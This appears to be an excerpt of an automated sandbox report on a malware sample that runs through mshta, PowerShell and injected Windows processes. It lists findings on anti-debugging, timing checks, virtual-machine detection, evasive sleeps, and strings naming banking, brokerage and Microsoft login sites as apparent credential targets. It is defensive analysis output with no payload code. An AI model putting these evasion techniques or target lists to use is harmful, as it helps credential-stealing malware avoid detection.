Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0160D1C0 rdtsc 7_2_0160D1C0
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1927 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1425 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4299 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5524 Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Window / User API: threadDelayed 1205 Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Window / User API: threadDelayed 8766 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Users\user\AppData\Roaming\rooma.exe API coverage: 0.8 %
Source: C:\Windows\SysWOW64\netbtugc.exe API coverage: 3.0 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7224 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7508 Thread sleep time: -14757395258967632s >= -30000s Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7604 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7720 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe TID: 8036 Thread sleep count: 1205 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe TID: 8036 Thread sleep time: -2410000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe TID: 8036 Thread sleep count: 8766 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe TID: 8036 Thread sleep time: -17532000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe TID: 8048 Thread sleep time: -70000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe TID: 8048 Thread sleep count: 33 > 30 Jump to behavior
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe TID: 8048 Thread sleep time: -49500s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe TID: 8048 Thread sleep count: 36 > 30 Jump to behavior
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe TID: 8048 Thread sleep time: -36000s >= -30000s Jump to behavior
Queries disk information (often used to detect virtual machines)
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0 Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\netbtugc.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\netbtugc.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_0256BAB0 FindFirstFileW,FindNextFileW,FindClose, 10_2_0256BAB0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: powershell.exe, 00000005.00000002.1464884328.0000021E7C6DE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}11ee-8
Source: F56GKLK7U4.10.dr Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: F56GKLK7U4.10.dr Binary or memory string: discord.comVMware20,11696494690f
Source: F56GKLK7U4.10.dr Binary or memory string: AMC password management pageVMware20,11696494690
Source: F56GKLK7U4.10.dr Binary or memory string: outlook.office.comVMware20,11696494690s
Source: F56GKLK7U4.10.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: F56GKLK7U4.10.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: F56GKLK7U4.10.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: F56GKLK7U4.10.dr Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: F56GKLK7U4.10.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: netbtugc.exe, 0000000A.00000002.3833651753.000000000288E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^)w
Source: F56GKLK7U4.10.dr Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: F56GKLK7U4.10.dr Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: F56GKLK7U4.10.dr Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: mshta.exe, 00000003.00000003.1487536110.00000237E135D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1490295950.00000237E135D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1489347883.00000237E12E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1486769366.00000237E12DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1486769366.00000237E135D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1490103800.00000237E12E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3113246043.0000024A0885C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: F56GKLK7U4.10.dr Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: mshta.exe, 00000003.00000003.1486769366.00000237E1315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1489347883.00000237E1315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1490103800.00000237E1315000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@k
Source: F56GKLK7U4.10.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: F56GKLK7U4.10.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: F56GKLK7U4.10.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: netbtugc.exe, 0000000A.00000002.3842765739.00000000078F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rs.comVMware20,11696494690
Source: powershell.exe, 00000005.00000002.1464884328.0000021E7C63E000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000F.00000002.1887708377.000002417EBEB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: F56GKLK7U4.10.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: F56GKLK7U4.10.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: F56GKLK7U4.10.dr Binary or memory string: tasks.office.comVMware20,11696494690o
Source: F56GKLK7U4.10.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: F56GKLK7U4.10.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: svchost.exe, 00000008.00000002.3112138074.0000024A0322B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWP
Source: F56GKLK7U4.10.dr Binary or memory string: dev.azure.comVMware20,11696494690j
Source: F56GKLK7U4.10.dr Binary or memory string: global block list test formVMware20,11696494690
Source: powershell.exe, 00000005.00000002.1464884328.0000021E7C6DE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_C
Source: TmjHHkXnMrncRmISMzN.exe, 0000000E.00000002.3834147913.000000000063F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllE
Source: F56GKLK7U4.10.dr Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: F56GKLK7U4.10.dr Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: F56GKLK7U4.10.dr Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: F56GKLK7U4.10.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: F56GKLK7U4.10.dr Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: F56GKLK7U4.10.dr Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: F56GKLK7U4.10.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: F56GKLK7U4.10.dr Binary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Checks if the current process is being debugged
Source: C:\Users\user\AppData\Roaming\rooma.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0160D1C0 rdtsc 7_2_0160D1C0
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_009C7823 LdrLoadDll, 7_2_009C7823
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01597152 mov eax, dword ptr fs:[00000030h] 7_2_01597152
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01596154 mov eax, dword ptr fs:[00000030h] 7_2_01596154
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01596154 mov eax, dword ptr fs:[00000030h] 7_2_01596154
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158C156 mov eax, dword ptr fs:[00000030h] 7_2_0158C156
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01589148 mov eax, dword ptr fs:[00000030h] 7_2_01589148
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01589148 mov eax, dword ptr fs:[00000030h] 7_2_01589148
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01589148 mov eax, dword ptr fs:[00000030h] 7_2_01589148
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01589148 mov eax, dword ptr fs:[00000030h] 7_2_01589148
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01629179 mov eax, dword ptr fs:[00000030h] 7_2_01629179
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01624144 mov eax, dword ptr fs:[00000030h] 7_2_01624144
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01624144 mov eax, dword ptr fs:[00000030h] 7_2_01624144
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01624144 mov ecx, dword ptr fs:[00000030h] 7_2_01624144
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01624144 mov eax, dword ptr fs:[00000030h] 7_2_01624144
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01624144 mov eax, dword ptr fs:[00000030h] 7_2_01624144
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158F172 mov eax, dword ptr fs:[00000030h] 7_2_0158F172
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158F172 mov eax, dword ptr fs:[00000030h] 7_2_0158F172
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158F172 mov eax, dword ptr fs:[00000030h] 7_2_0158F172
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158F172 mov eax, dword ptr fs:[00000030h] 7_2_0158F172
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158F172 mov eax, dword ptr fs:[00000030h] 7_2_0158F172
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158F172 mov eax, dword ptr fs:[00000030h] 7_2_0158F172
